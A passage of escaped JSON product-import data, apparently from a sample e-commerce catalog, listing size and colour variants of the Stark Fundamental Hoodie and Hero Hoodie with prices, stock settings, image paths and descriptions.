\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},{\"sku\":\"MH06-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-L-Purple\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},{\"sku\":\"MH06-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-XL-Black\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},{\"sku\":\"MH06-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-XL-Blue\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},{\"sku\":\"MH06-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-XL-Purple\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},{\"sku\":\"MH06\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Wool|Polyester|Nylon,pattern=Solid,climate=All-weather|Cool|Indoor|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH06-XS-Black,size=XS,color=Black|sku=MH06-XS-Blue,size=XS,color=Blue|sku=MH06-XS-Purple,size=XS,color=Purple|sku=MH06-S-Black,size=S,color=Black|sku=MH06-S-Blue,size=S,color=Blue|sku=MH06-S-Purple,size=S,color=Purple|sku=MH06-M-Black,size=M,color=Black|sku=MH06-M-Blue,size=M,color=Blue|sku=MH06-M-Purple,size=M,color=Purple|sku=MH06-L-Black,size=L,color=Black|sku=MH06-L-Blue,size=L,color=Blue|sku=MH06-L-Purple,size=L,color=Purple|sku=MH06-XL-Black,size=XL,color=Black|sku=MH06-XL-Blue,size=XL,color=Blue|sku=MH06-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Wool|Polyester|Nylon\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},{\"sku\":\"MH07-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-XS-Black\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},{\"sku\":\"MH07-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-XS-Gray\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},{\"sku\":\"MH07-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-XS-Green\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},{\"sku\":\"MH07-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-S-Black\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front 